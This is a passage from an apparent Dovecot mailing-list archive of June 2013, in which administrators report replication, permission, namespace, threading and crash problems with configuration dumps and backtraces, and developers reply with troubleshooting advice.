excellent way for Timo to monetize his incredible efforts with dovecot. -- Best regards, Charles From srf at sanger.ac.uk Wed Jun 12 13:39:01 2013 From: srf at sanger.ac.uk (Simon Fraser) Date: Wed, 12 Jun 2013 11:39:01 +0100 Subject: [Dovecot] Replication and LAYOUT=fs Message-ID: <1371033541.2449.14.camel@ubu101751> Hello folks, I have a problem with replication and mail_location with LAYOUT=fs set. If I set "mail_location = maildir:~/mail" (leaving out the :LAYOUT=fs), create and populate some mailboxes and subfolders, they all get replicated. If I start with a clean mail spool and LAYOUT=fs, I can create some new mailboxes and subfolders but only the inbox is replicated. Subfolders are ignored. The users are all in LDAP, and virtual, hence the generic mail_home format and mail_location being set. The userdb lookup has been told to return no attributes ("user_attrs = "), but I have also tried it with requesting 'home' and specifying a default of /mail/spool/%u in the userdb config. The service is perfectly functional as far as a mail client is concerned: it can access all the folders and messages it expects on the server that had them added. It's only the replication using LAYOUT=fs that seems to be troublesome. Here is `doveconf -n` for the first of the pair of servers (dcot1a and dcot1b). The configuration on the other is identical except for the hostname differences. Simon # 2.2.2: /mail/etc/dovecot/dovecot.conf # OS: Linux 3.2.0-27-virtual x86_64 Ubuntu 12.04.2 LTS disable_plaintext_auth = no doveadm_password = secret first_valid_uid = 100 mail_gid = dovecot mail_home = /mail/spool/%u mail_location = maildir:~/mail:LAYOUT=fs mail_plugins = notify replication mail_uid = dovecot namespace inbox { inbox = yes location = mailbox Drafts { special_use = \Drafts } mailbox Junk { special_use = \Junk } mailbox Sent { special_use = \Sent } mailbox "Sent Messages" { special_use = \Sent } mailbox Trash { special_use = \Trash } prefix = separator = / } passdb { args = /mail/etc/dovecot/dovecot-ldap.conf.ext driver = ldap } plugin { mail_replica = tcp:dcot1b:12345 } protocols = imap lmtp service aggregator { fifo_listener replication-notify-fifo { mode = 0600 user = dovecot } unix_listener replication-notify { mode = 0600 user = dovecot } } service config { unix_listener config { user = dovecot } } service doveadm { inet_listener { port = 12345 } user = dovecot } service replicator { process_min_avail = 1 } shutdown_clients = no ssl_cert = References: <68FF8205-BD27-4831-A112-55E74E64F2D7@sealedabstract.com> Message-ID: <9C78263F-169D-48DC-BBE3-392EDB05A0BA@sealedabstract.com> FYI, the answer was in the filesystem. EncFS says > Secondly, the --public flag changes how encfs's node creation functions work - as they will try and set ownership of new nodes based on the caller identification. It seems that this was the culprit. On Jun 12, 2013, at 4:53 AM, Andrew Crawford wrote: > I have postfix configured to deliver mail to dovecot over lmtp into a mailbox that then is accessed over imap. The imap server is running as the user "mail". Whenever I run "postfix flush" I get in mail.log: > >> Jun 12 05:37:45 li212-205 dovecot: lmtp(21288): Connect from local >> Jun 12 05:37:45 li212-205 spamd[18173]: prefork: child states: II >> Jun 12 05:37:45 li212-205 dovecot: auth-worker(21289): mysql(127.0.0.1): Connected to database mailserver >> Jun 12 05:37:45 li212-205 dovecot: lmtp(21288, drew at REDACTED): zXAqF2lBuFEoUwAA5SnFYQ: msgid=<064C5BC7-357B-4366-9A80-5001DBA21F62 at REDACTED>: saved mail to INBOX >> Jun 12 05:37:45 li212-205 postfix/lmtp[21287]: 57BDA1CC932: to=, relay=li212-205.members.linode.com[private/dovecot-lmtp], delay=0.06, delays=0.01/0.01/0.01/0.03, dsn=2.0.0, status=sent (250 2.0.0 zXAqF2lBuFEoUwAA5SnFYQ Saved) >> Jun 12 05:37:45 li212-205 dovecot: lmtp(21288): Disconnect from local: Client quit (in reset) >> Jun 12 05:37:45 li212-205 postfix/qmgr[21244]: 57BDA1CC932: removed >> Jun 12 05:37:45 li212-205 dovecot: imap(drew at REDACTED): Error: open(/decrypted-mail/awesomebox.sealedabstract.com/drew/cur/1371029865.M411903P21288.li212-205,S=2626,W=2673:2,) failed: Permission denied (euid=8(mail) egid=8(mail) missing +r perm: /decrypted-mail/awesomebox.sealedabstract.com/drew/cur/1371029865.M411903P21288.li212-205,S=2626,W=2673:2,, we're not in group 0(root)) >> Jun 12 05:37:45 li212-205 dovecot: imap(drew at REDACTED): Disconnected: Internal error occurred. Refer to server log for more information. [2013-06-12 05:37:45] in=349 out=1084 > > > Indeed, the file in question is owned by root and would not be accessible to the mail user: > >> ls -la /decrypted-mail/awesomebox.sealedabstract.com/drew/cur/ >> total 24 >> drwxrw---- 2 mail mail 4096 Jun 12 05:37 . >> drwxrw---- 7 mail mail 4096 Jun 12 05:37 .. >> -rw-rw---- 1 mail mail 2616 Jun 12 05:26 1371029196.M462737P20302.li212-205,S=2616,W=2662:2, >> -rw-rw---- 1 mail mail 2635 Jun 12 05:32 1371029564.M454251P20747.li212-205,S=2635,W=2682:2, >> -rw-rw---- 1 root root 2626 Jun 12 05:37 1371029865.M411903P21288.li212-205,S=2626,W=2673:2, > > So dutifully, I chown / chgrp to the mail user. But as soon as i receive a new mail, dovecot again creates files owned by root:root. > > How do I convince it to create files as mail:mail ? > > > Diagnostic info: > >> $ dovecot --version >> 2.1.7 > >> $ ps -aux | grep dovecot >> root 20810 0.0 0.0 2892 984 ? Ss 05:34 0:00 /usr/sbin/dovecot -c /etc/dovecot/dovecot.conf >> dovecot 20813 0.0 0.0 2620 940 ? S 05:34 0:00 dovecot/anvil >> root 20814 0.0 0.1 2752 1072 ? S 05:34 0:00 dovecot/log >> root 20818 0.0 0.2 4348 2524 ? S 05:34 0:00 dovecot/config >> dovenull 21046 0.0 0.2 5248 2500 ? S 05:35 0:00 dovecot/imap-login >> mail 21047 0.0 0.2 6392 2088 ? S 05:35 0:00 dovecot/imap >> dovenull 21056 0.0 0.2 5248 2500 ? S 05:35 0:00 dovecot/imap-login >> mail 21057 0.0 0.2 6752 2576 ? S 05:35 0:00 dovecot/imap >> dovenull 21292 0.0 0.2 5248 2500 ? S 05:37 0:00 dovecot/imap-login >> root 21293 0.0 0.1 4508 1044 ? S 05:37 0:00 dovecot/ssl-params >> mail 21294 0.0 0.2 6540 2624 ? S 05:37 0:00 dovecot/imap >> root 21400 0.0 0.0 4104 788 pts/0 S+ 05:51 0:00 grep dovecot > >> $ doveconf -n >> # 2.1.7: /etc/dovecot/dovecot.conf >> # OS: Linux 3.8.4-linode50 i686 Debian 7.0 fuse.encfs >> auth_mechanisms = plain login >> first_valid_uid = 0 >> mail_location = maildir:/decrypted-mail/%d/%n >> mail_privileged_group = mail >> namespace inbox { >> inbox = yes >> location = >> mailbox Drafts { >> special_use = \Drafts >> } >> mailbox Junk { >> special_use = \Junk >> } >> mailbox Sent { >> special_use = \Sent >> } >> mailbox "Sent Messages" { >> special_use = \Sent >> } >> mailbox Trash { >> special_use = \Trash >> } >> prefix = >> } >> passdb { >> args = /etc/dovecot/dovecot-sql.conf.ext >> driver = sql >> } >> protocols = " imap lmtp" >> service auth-worker { >> user = mail >> } >> service auth { >> unix_listener /var/spool/postfix/private/auth { >> group = postfix >> mode = 0600 >> user = postfix >> } >> unix_listener auth-userdb { >> mode = 0600 >> user = mail >> } >> user = dovecot >> } >> service imap-login { >> inet_listener imap { >> port = 0 >> } >> } >> service lmtp { >> unix_listener /var/spool/postfix/private/dovecot-lmtp { >> group = postfix >> mode = 0666 >> user = postfix >> } >> user = mail >> } >> service pop3-login { >> inet_listener pop3 { >> port = 0 >> } >> } >> ssl = required >> ssl_cert = > ssl_key = > userdb { >> args = uid=mail gid=mail home=/decrypted-mail/%d/%n >> driver = static >> } >> > > > From maillist.debian at gmail.com Wed Jun 12 20:44:50 2013 From: maillist.debian at gmail.com (Alex Dubinin) Date: Wed, 12 Jun 2013 21:44:50 +0400 Subject: [Dovecot] Dovecot 2 + IMAP Message-ID: <51B8B392.1010805@gmail.com> This is my first experience of the mail server. Set up a mail server from Postfix + Dovecot with the MySQL authorization. When you create a new user dovecot makes strange folder structure: the 'inbox' contains 'juncus', 'tash', 'sent' etc. ie 'sent' and other folders are subdir to the 'inbox'. How to make the imap folders 'sent', 'trash' and others were not affiliated? I have IMAP answer: . list "" "*" * LIST (\HasChildren) "." "INBOX" . OK List completed. No trash, no drafts, no other folder. All this folder included in INBOX (((( But I want (my clients wants): * LIST (\HasNoChildren) "." "Drafts" * LIST (\HasNoChildren) "." "INBOX" * LIST (\HasNoChildren) "." "Trash" * LIST (\HasNoChildren) "." "Sent" * LIST (\HasNoChildren) "." "spam" P.S. Sorry for my english. P.P.S. # dovecot --version 2.1.7 # dovecot -n # 2.1.7: /etc/dovecot/dovecot.conf # OS: Linux 3.2.0-4-amd64 x86_64 Debian 7.0 ext4 auth_debug = yes auth_debug_passwords = yes auth_verbose = yes auth_verbose_passwords = plain base_dir = /run/dovecot/ debug_log_path = /var/vmail/dovecot.log disable_plaintext_auth = no info_log_path = /var/vmail/dovecot.log lda_mailbox_autocreate = yes lda_mailbox_autosubscribe = yes listen = 213.7.204.34 log_path = /var/vmail/dovecot.log log_timestamp = "%Y-%m-%d %H:%M:%S " login_greeting = MAIL_DOMAIN_NAME IMAP server ready. mail_debug = yes mail_location = maildir:/var/vmail/%d/%n/Maildir mail_plugins = " quota" namespace inbox { hidden = no inbox = yes list = yes location = mailbox Drafts { special_use = \Drafts } mailbox Trash { special_use = \Trash } mailbox Junk { special_use = \Junk } mailbox Sent { special_use = \Sent } prefix = INBOX. separator = . type = private } passdb { args = /etc/dovecot/dovecot-sql.conf.ext driver = sql } plugin { quota = maildir:User quota quota_rule = *:storage=1G quota_rule2 = Trash:storage=+10%% quota_rule3 = Junk:storage=+10%% quota_rule4 = Drafts:storage=+10%% quota_warning = storage=95%% quota-warning 95 %u } postmaster_address = admin@ MAIL_DOMAIN_NAME protocols = " imap pop3" service auth-worker { executable = auth -w unix_listener auth-worker { group = mode = 0600 } } service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0660 user = postfix } unix_listener auth-master { group = vmail mode = 0600 user = vmail } unix_listener auth-userdb { group = mode = 0600 user = } user = root } service dict { unix_listener dict { group = mode = 0600 user = } } service imap-login { inet_listener imap { port = 0 } inet_listener imaps { port = 993 ssl = yes } process_min_avail = 0 service_count = 1 } service imap { unix_listener login/imap { group = mode = 0666 user = } } service lmtp { unix_listener lmtp { group = mode = 0666 user = } } service pop3-login { inet_listener pop3 { port = 0 } inet_listener pop3s { port = 0 ssl = yes } } service pop3 { unix_listener login/pop3 { group = mode = 0666 user = } } ssl = required ssl_ca = From alec at alec.pl Wed Jun 12 20:53:24 2013 From: alec at alec.pl (A.L.E.C) Date: Wed, 12 Jun 2013 19:53:24 +0200 Subject: [Dovecot] Dovecot 2 + IMAP In-Reply-To: <51B8B392.1010805@gmail.com> References: <51B8B392.1010805@gmail.com> Message-ID: <51B8B594.1020702@alec.pl> On 06/12/2013 07:44 PM, Alex Dubinin wrote: > This is my first experience of the mail server. > > Set up a mail server from Postfix + Dovecot with the MySQL > authorization. When you create a new user dovecot makes strange folder > structure: the 'inbox' contains 'juncus', 'tash', 'sent' etc. ie 'sent' > and other folders are subdir to the 'inbox'. How to make the imap > folders 'sent', 'trash' and others were not affiliated? > prefix = INBOX. Remove this. This is a common misconfiguration. Where did you find this? Does Debian have this in default config or sth? -- Aleksander 'A.L.E.C' Machniak LAN Management System Developer [http://lms.org.pl] Roundcube Webmail Developer [http://roundcube.net] --------------------------------------------------- PGP: 19359DC1 @@ GG: 2275252 @@ WWW: http://alec.pl From berni at birkenwald.de Wed Jun 12 22:51:57 2013 From: berni at birkenwald.de (Bernhard Schmidt) Date: Wed, 12 Jun 2013 19:51:57 +0000 (UTC) Subject: [Dovecot] LMTP crash with sdbox and SIS Message-ID: Debian Wheezy amd64 plus Stefan's stable-auto/dovecot2.2 repository 2:2.2.2-0~auto+57 = 16495:d447dcc6b611 Crash goes away when I disable mail_attachment_dir, happens with a fresh home as well # 2.2.2 (d447dcc6b611): /etc/dovecot/dovecot.conf # OS: Linux 3.2.0-4-amd64 x86_64 Debian 7.0 disable_plaintext_auth = no first_valid_uid = 100 mail_attachment_dir = /home/studext/attachment mail_gid = ext mail_location = sdbox:~/sdbox:INDEX=~/Index mail_plugins = quota mail_uid = studext managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave namespace inbox { inbox = yes location = mailbox Drafts { special_use = \Drafts } mailbox Junk { special_use = \Junk } mailbox Sent { special_use = \Sent } mailbox "Sent Messages" { special_use = \Sent } mailbox Trash { special_use = \Trash } prefix = INBOX. separator = . } passdb { args = /etc/dovecot/dovecot-ldap.conf.ext driver = ldap } plugin { quota = dict:User quota::file:%h/Maildir/dovecot-quota quota_rule = INBOX.Trash:ignore quota_rule2 = ?:storage=512M sieve = ~/currently-active-script.sieve sieve_dir = ~/sieve } protocols = " imap lmtp sieve pop3" service lmtp { executable = lmtp -D inet_listener lmtp { port = 24 } } ssl_cert = , status=status at entry=0) at failures.c:191 backtrace = 0x97e900 "/usr/lib/dovecot/libdovecot.so.0(+0x62dea) [0x7fc2712cbdea] -> /usr/lib/dovecot/libdovecot.so.0(+0x62e2e) [0x7fc2712cbe2e] -> /usr/lib/dovecot/libdovecot.so.0(i_fatal+0) [0x7fc27128bda5] -> /usr/lib/d"... #3 0x00007fc2712cbe2e in i_internal_fatal_handler (ctx=0x7fff6b38a7c0, format=, args=) at failures.c:652 status = 0 #4 0x00007fc27128bda5 in i_panic (format=format at entry=0x7fc2712f18c8 "file %s: line %d (%s): assertion failed: (%s)") at failures.c:263 ctx = {type = LOG_TYPE_PANIC, exit_status = 0, timestamp = 0x0} args = {{gp_offset = 40, fp_offset = 48, overflow_arg_area = 0x7fff6b38a8b0, reg_save_area = 0x7fff6b38a7f0}} #5 0x00007fc2712d4734 in i_stream_read (stream=0x9c3740) at istream.c:163 _stream = 0x9c36e0 old_size = 0 ret = -1 __FUNCTION__ = "i_stream_read" #6 0x00007fc2715ca2c9 in index_attachment_save_continue (ctx=0x9b7ef0) at index-attachment.c:206 storage = 0x9ae590 attach = 0x9c3310 data = size = 1 ret = #7 0x00007fc2715a78a8 in mail_storage_try_copy (mail=0x9a3c60, _ctx=0x7fff6b38a928) at mail-copy.c:80 ctx = 0x9b7ef0 pmail = 0x9a3c60 input = 0x9b57c0 #8 mail_storage_copy (ctx=ctx at entry=0x9b7ef0, mail=mail at entry=0x9a3c60) at mail-copy.c:101 No locals. #9 0x00007fc271576810 in sdbox_copy (_ctx=, mail=) at sdbox-copy.c:172 ctx = _t = mbox = __FUNCTION__ = "sdbox_copy" #10 0x00007fc2706b1320 in quota_copy (ctx=0x9b7ef0, mail=0x9a3c60) at quota-storage.c:220 t = 0x9b4b70 qt = 0x9b7e80 qbox = 0x9b2450 #11 0x00007fc2715afadf in mailbox_copy (_ctx=_ctx at entry=0x7fff6b38aaa8, mail=0x9a3c60) at mail-storage.c:2116 ctx = 0x9b7ef0 t = 0x9b4b70 keywords = 0x0 pvt_flags = 0 ---Type to continue, or q to quit--- real_mail = ret = __FUNCTION__ = "mailbox_copy" #12 0x00007fc2715afb8c in mailbox_save_using_mail (ctx=ctx at entry=0x7fff6b38aaa8, mail=) at mail-storage.c:2147 No locals. #13 0x00007fc27184ddde in mail_deliver_save (ctx=ctx at entry=0x7fff6b38ac10, mailbox=, flags=flags at entry=0, keywords=keywords at entry=0x0, storage_r=storage_r at entry=0x7fff6b38abe8) at mail-deliver.c:311 open_ctx = {user = 0x9aa470, lda_mailbox_autocreate = false, lda_mailbox_autosubscribe = false} box = 0x9b1e80 trans_flags = t = 0x9b4b70 save_ctx = 0x0 headers_ctx = 0x0 kw = 0x0 error = MAIL_ERROR_NONE mailbox_name = 0x40892f "INBOX" errstr = guid = 0x7fc271847d98 "W\n" changes = {pool = 0x7fc271a52788, uid_validity = 1798876136, saved_uids = {arr = {buffer = 0x9992d0, element_size = 140473107114581}, v = 0x9992d0, v_modifiable = 0x9992d0}, ignored_modseq_changes = 10165232, changed = false, no_read_perm = false} default_save = ret = 0 __FUNCTION__ = "mail_deliver_save" #14 0x00007fc27184e203 in mail_deliver (ctx=ctx at entry=0x7fff6b38ac10, storage_r=storage_r at entry=0x7fff6b38abe8) at mail-deliver.c:413 ret = -1 #15 0x0000000000406282 in client_deliver (session=0x9a8480, src_mail=0x9a3c60, rcpt=0x98b770, client=0x98af00) at commands.c:689 lda_set = 0x999b00 ns = set_parser = line = storage = 0x9ae590 sets = mail_error = MAIL_ERROR_NONE ret = dctx = {pool = 0x9a8460, set = 0x999b00, session = 0x9a8480, dup_ctx = 0x0, session_id = 0x98b710 "zeL+MQ/QuFGZTgAAUJ203Q", src_mail = 0x9a3c60, src_envelope_sender = 0x98b728 "schmidt at xxx.de", dest_user = 0x9aa470, dest_addr = 0x98bd70 "ext44903 at mstoretest.mail.xxx.de", final_dest_addr = 0x98bd70 "ext44903 at mstoretest.mail.xxx.de", dest_mailbox_name = 0x40892f "INBOX", dest_mail = 0x9b8830, var_expand_table = 0x0, tempfail_error = 0x0, tried_default_save = true, saved_mail = false, save_dest_mail = false, mailbox_full = false, dsn = false} input = mail_set = 0x9992d0 error = username = #16 client_deliver_next (session=0x9a8480, src_mail=0x9a3c60, client=0x98af00) at commands.c:732 rcpts = 0x98b770 count = 1 #17 client_input_data_write_local (input=, client=0x98af00) at commands.c:827 src_mail = 0x9a3c60 first_uid = 4294967295 session = 0x9a8480 old_uid = 0 #18 client_input_data_write (client=0x98af00) at commands.c:938 input = 0x99b5b0 ret = true #19 client_input_data_handle (client=0x98af00) at commands.c:1032 data = size = 1794 ret = #20 0x00007fc2712db996 in io_loop_call_io (io=0x98a3b0) at ioloop.c:387 ioloop = 0x985700 t_id = 2 #21 0x00007fc2712dc807 in io_loop_handler_run (ioloop=ioloop at entry=0x985700) at ioloop-epoll.c:215 ctx = 0x988530 events = 0x0 event = 0x9885a0 list = 0x98a400 io = tv = {tv_sec = 299, tv_usec = 992938} events_count = msecs = ret = 1 i = call = __FUNCTION__ = "io_loop_handler_run" #22 0x00007fc2712db4d8 in io_loop_run (ioloop=0x985700) at ioloop.c:406 No locals. #23 0x00007fc271291013 in master_service_run (service=0x985590, callback=callback at entry=0x404dd0 ) at master-service.c:560 No locals. #24 0x0000000000404c24 in main (argc=2, argv=0x985390) at main.c:122 set_roots = {0x60a6a0, 0x409260, 0x0} service_flags = storage_service_flags = 739 c = From berni at birkenwald.de Wed Jun 12 22:55:07 2013 From: berni at birkenwald.de (Bernhard Schmidt) Date: Wed, 12 Jun 2013 19:55:07 +0000 (UTC) Subject: [Dovecot] LMTP crash with sdbox and SIS References: Message-ID: Bernhard Schmidt wrote: > Debian Wheezy amd64 plus Stefan's stable-auto/dovecot2.2 repository > 2:2.2.2-0~auto+57 = 16495:d447dcc6b611 > > Crash goes away when I disable mail_attachment_dir, happens with a > fresh home as well Log: Jun 12 21:46:23 lxmhs69 dovecot: lmtp(20120, ext44903 at mstoretest.mail.xxx.de): Panic: file istream.c: line 163 (i_stream_read): assertion failed: (old_size == _stream->pos - _stream->skip) Jun 12 21:46:23 lxmhs69 dovecot: lmtp(20120, ext44903 at mstoretest.mail.xxx.de): Error: Raw backtrace: /usr/lib/dovecot/libdovecot.so.0(+0x62dea) [0x7fc8363e9dea] -> /usr/lib/dovecot/libdovecot.so.0(+0x62e2e) [0x7fc8363e9e2e] -> /usr/lib/dovecot/libdovecot.so.0(i_fatal+0) [0x7fc8363a9da5] -> /usr/lib/dovecot/libdovecot.so.0(i_stream_read+0x184) [0x7fc8363f2734] -> /usr/lib/dovecot/libdovecot-storage.so.0(index_attachment_save_continue+0x29) [0x7fc8366e82c9] -> /usr/lib/dovecot/libdovecot-storage.so.0(mail_storage_copy+0x78) [0x7fc8366c58a8] -> /usr/lib/dovecot/libdovecot-storage.so.0(sdbox_copy+0x60) [0x7fc836694810] -> /usr/lib/dovecot/modules/lib10_quota_plugin.so(+0xb320) [0x7fc8357cf320] -> /usr/lib/dovecot/libdovecot-storage.so.0(mailbox_copy+0x5f) [0x7fc8366cdadf] -> /usr/lib/dovecot/libdovecot-lda.so.0(mail_deliver_save+0x16e) [0x7fc83696bdde] -> /usr/lib/dovecot/libdovecot-lda.so.0(mail_deliver+0x113) [0x7fc83696c203] -> dovecot/lmtp() [0x406282] -> /usr/lib/dovecot/libdovecot.so.0(io_loop_call_io+0x36) [0x7fc8363f9996] -> /usr/lib/dovecot/libdovecot.so.0(io_loop_handler_run+0xd7) [0x7fc8363fa807] -> /usr/lib/dovecot/libdovecot.so.0(io_loop_run+0x28) [0x7fc8363f94d8] -> /usr/lib/dovecot/libdovecot.so.0(master_service_run+0x13) [0x7fc8363af013] -> dovecot/lmtp(main+0x184) [0x404c24] -> /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xfd) [0x7fc83601bead] -> dovecot/lmtp() [0x404ce9] Regards, Bernhard From slusarz at curecanti.org Thu Jun 13 01:03:01 2013 From: slusarz at curecanti.org (Michael M Slusarz) Date: Wed, 12 Jun 2013 16:03:01 -0600 Subject: [Dovecot] THREAD REFERENCES bug In-Reply-To: <51B8291E.4090506@alec.pl> References: <51B81AED.2000601@alec.pl> <51B8291E.4090506@alec.pl> Message-ID: <20130612160301.Horde.Fm27sU0NRrUqO7AUlysPoQ1@bigworm.curecanti.org> Quoting "A.L.E.C" : > On 06/12/2013 08:53 AM, A.L.E.C wrote: >> C: A0003 UID THREAD REFERENCES US-ASCII ALL >> S: * THREAD (12)((11)(16))(14) >> >> I expected 16 (or more likely 11 and 16) to be at the end of the result, >> after 14, i.e. (12)(14)((11)(16)). > > I see the same in Cyrus. So, maybe this is how REFERENCES is supposed to > work. RFC is not clear to me. I'm curious if THREAD=REFS works as I expect. Dovecot/Cyrus is correct. Threading is sorted by the date of the *first* (i.e. root) message in the thread. RFC 5256 (from the references sorting algorithm): (2) Gather together all of the messages that have no parents and make them all children (siblings of one another) of a dummy parent (the "root"). These messages constitute the first (head) message of the threads created thus far. ... (4) Sort the messages under the root (top-level siblings only) by sent date as described in section 2.2. In the case of a dummy message, sort its children by sent date and then use the first child for the top-level sort. In this case, message 11 is a "head" message - since it has no parents - and thus it is the message used for the date sort in Step 4. michael From tss at iki.fi Thu Jun 13 04:56:53 2013 From: tss at iki.fi (Timo Sirainen) Date: Thu, 13 Jun 2013 04:56:53 +0300 Subject: [Dovecot] LMTP crash with sdbox and SIS In-Reply-To: References: Message-ID: <1371088613.24006.9.camel@innu.dovecot.net> On Wed, 2013-06-12 at 19:51 +0000, Bernhard Schmidt wrote: > Debian Wheezy amd64 plus Stefan's stable-auto/dovecot2.2 repository > 2:2.2.2-0~auto+57 = 16495:d447dcc6b611 > > Crash goes away when I disable mail_attachment_dir, happens with a > fresh home as well .. > Jun 12 21:46:23 lxmhs69 dovecot: lmtp(20120, > ext44903 at mstoretest.mail.xxx.de): Panic: file istream.c: line 163 > (i_stream_read): assertion failed: (old_size == _stream->pos - > _stream->skip) Can you easily reproduce this? Does it happen with all mails? Only mails that contain attachments? Only one specific mail? I couldn't reproduce with a couple of tests. From tss at iki.fi Thu Jun 13 04:59:38 2013 From: tss at iki.fi (Timo Sirainen) Date: Thu, 13 Jun 2013 04:59:38 +0300 Subject: [Dovecot] Replication and LAYOUT=fs In-Reply-To: <1371033541.2449.14.camel@ubu101751> References: <1371033541.2449.14.camel@ubu101751> Message-ID: <1371088778.24006.11.camel@innu.dovecot.net> On Wed, 2013-06-12 at 11:39 +0100, Simon Fraser wrote: > Hello folks, > > I have a problem with replication and mail_location with LAYOUT=fs set. > > If I set "mail_location = maildir:~/mail" (leaving out the :LAYOUT=fs), > create and populate some mailboxes and subfolders, they all get > replicated. If I start with a clean mail spool and LAYOUT=fs, I can > create some new mailboxes and subfolders but only the inbox is > replicated. Subfolders are ignored. I can't think of how that's possible, unless you have different mail_location settings in different places (e.g. doveadm sees something different than imap). Does "doveadm mailbox list -u user at domain" work with LAYOUT=fs? From tss at iki.fi Thu Jun 13 05:02:59 2013 From: tss at iki.fi (Timo Sirainen) Date: Thu, 13 Jun 2013 05:02:59 +0300 Subject: [Dovecot] Connection closed by foreign host. In-Reply-To: <20130611192841.Horde.dSxEri7dixlgJ-8Kf7tulg5@horde.bigmichi1.de> References: <20130611192841.Horde.dSxEri7dixlgJ-8Kf7tulg5@horde.bigmichi1.de> Message-ID: <1371088979.24006.12.camel@innu.dovecot.net> On Tue, 2013-06-11 at 19:28 +0200, Michael Cramer wrote: > i tried the latest dev version 2.2.2-0~auto54 for ubuntu and when i do some > testing i got a connection closed. > > the commands are issued through telnet: > > 3 LIST () "" (*) > Connection closed by foreign host. > > > the command with number 3 results everytime in a connection closed. i > turned on debug_log but nothing is shown there. doveconf -n output? From tss at iki.fi Thu Jun 13 05:31:25 2013 From: tss at iki.fi (Timo Sirainen) Date: Thu, 13 Jun 2013 05:31:25 +0300 Subject: [Dovecot] dovecot corrupted transaction log In-Reply-To: <51B6547A.7050504@erba.tv> References: <51B6547A.7050504@erba.tv> Message-ID: <1371090685.24006.14.camel@innu.dovecot.net> On Tue, 2013-06-11 at 00:34 +0200, John Fawcett wrote: > Hi I came across this error which happend immedately after a mail > delivery to the inbox. Should I look for the problem externally to > dovecot (ie. file system, operating system) or within dovecot? I never > saw this error before installing 2.2.1, with 2.2.2 I seemed to get even > more of them so currently back on 2.2.1 > > Jun 11 00:00:05 rosalia dovecot: imap(myemail at mydomain): Error: > Corrupted transaction log file > /var/vmail/mydomain/myemail at mydomain/dovecot.index.log seq 311: file > size shrank (1184 < 1304) (sync_offset=1304) Are you using NFS or some other cluster filesystem with multiple servers? If yes, see http://wiki2.dovecot.org/NFS. If not, show doveconf -n and describe the setup more. From tss at iki.fi Thu Jun 13 05:33:36 2013 From: tss at iki.fi (Timo Sirainen) Date: Thu, 13 Jun 2013 05:33:36 +0300 Subject: [Dovecot] dovecot segfaults after upgrade In-Reply-To: References: Message-ID: <1371090816.24006.15.camel@innu.dovecot.net> On Mon, 2013-06-10 at 12:30 +0200, Thomas Blomenkamp wrote: > > Using dovecot on debian oldstable (squeeze) with daily builded repository, > after an upgrade this morning, dovecot always shows the following error: > > 2013 Jun 10 11:07:22 mailstore imap(tblomenk): Fatal: master: > service(imap): child 3016 killed with signal 11 (core dumps disabled) > Jun 10 11:07:22 mailstore kernel: [ 1589.400741] imap[3016]: segfault at > 7fffd9048ff8 ip 00007f91417e2c3b sp 00007fffd9049000 error 6 in > libdovecot.so.0.0.0[7f9141796000+bc000] Is this already fixed? If not, gdb backtraces are the best way to debug crashes: http://dovecot.org/bugreport.html From tss at iki.fi Thu Jun 13 05:41:55 2013 From: tss at iki.fi (Timo Sirainen) Date: Thu, 13 Jun 2013 05:41:55 +0300 Subject: [Dovecot] rawlog without setting home in userdb In-Reply-To: <51AAFE3C.8080701@bayern-mail.de> References: <51AAFE3C.8080701@bayern-mail.de> Message-ID: <1371091315.24006.16.camel@innu.dovecot.net> On Sun, 2013-06-02 at 10:11 +0200, Claus wrote: > Hi all, > > in my settup i decided to set mail_home in 10-mail.conf, > and let dovecot do the hashing to a 2-level directory structure. > > mail_location = mdbox:~/mdbox:ALT=/altstorage/%h/mdbox > mail_home = /vmail/%1Mu/%2.1Mu/%u > > In my userdb ist homedirectory not set and everythink works as expected, > except when i use rawlog i get only logs in ~/dovecot.rawlog if home is > set in userdb. > In wiki http://wiki2.dovecot.org/Debugging/Rawlog > it reads: > > If you don't have the home directory and you can't or don't want to > modify userdb configuration, you can add: > mail_home = /home/%u > # or temporarily even e.g. mail_home = /tmp/temp-home Looks like the wiki was wrong, mail_home field can't work there. Updated it with a new suggestion about userdb { default_fields }. From tss at iki.fi Thu Jun 13 06:11:49 2013 From: tss at iki.fi (Timo Sirainen) Date: Thu, 13 Jun 2013 06:11:49 +0300 Subject: [Dovecot] crash/mem violation in auth_worker + 50G logs in 2.1.7 In-Reply-To: <51B31526.2030609@ii.nl> References: <51B31526.2030609@ii.nl> Message-ID: <1371093109.24006.21.camel@innu.dovecot.net> On Sat, 2013-06-08 at 13:27 +0200, Mrten wrote: > Hi, > > This morning I discovered what seemed to be a deliberate crash in > auth_worker: > > Jun 7 23:02:09 localhost dovecot: auth-worker: Error: #007Can't read > dir of '/etc/mysql/conf.d/' (Errcode: 2) > Jun 7 23:02:09 localhost dovecot: auth-worker: Error: Fatal error in > defaults handling. Program aborted > Jun 7 23:02:09 localhost dovecot: auth-worker: Error: *** glibc > detected *** dovecot/auth worker: waiting for connection: free(): > invalid pointer: 0x00007fffa0863160 *** .. > /usr/lib/libmysqlclient.so.18(free_defaults+0x4b)[0x7f22d3796e6b] > Jun 7 23:02:09 localhost dovecot: auth-worker: Error: > /usr/lib/libmysqlclient.so.18(mysql_read_default_options+0x13c)[0x7f22d377d00c] > Jun 7 23:02:09 localhost dovecot: auth-worker: Error: > /usr/lib/libmysqlclient.so.18(mysql_real_connect+0x8e)[0x7f22d377eb4e] It crashes in mysql_real_connect() internally, which also starts the whole mysql session. So this is a bug in MySQL library. > This repeated until I killed dovecot (12 hours later), by then 54GB of > logs had accumulated. Besides leaving me impressed with the logserver > :), I was wondering if this is a known problem. > > Shouldn't dovecot recognize that the auth worker is crashing? Looks like there was a generic problem with how crash during initialization was handled. This should fix all of them: http://hg.dovecot.org/dovecot-2.2/rev/754d244b8249 > One more thing, this is (one line from many) from audit.log (I have > auditd logging audit records) > > type=ANOM_ABEND msg=audit(1370682566.377:3499876): auid=4294967295 > uid=108 gid=115 ses=4294967295 pid=23187 comm="auth" reason="memory > violation" sig=6 > > 108 is the dovecot user, so it probably is related. Yeah, that's the same abort() crash. From tss at iki.fi Thu Jun 13 06:17:10 2013 From: tss at iki.fi (Timo Sirainen) Date: Thu, 13 Jun 2013 06:17:10 +0300 Subject: [Dovecot] Permissions for mail_temp_dir directory In-Reply-To: <51B026E6.8060308@spambox.dk> References: <51B026E6.8060308@spambox.dk> 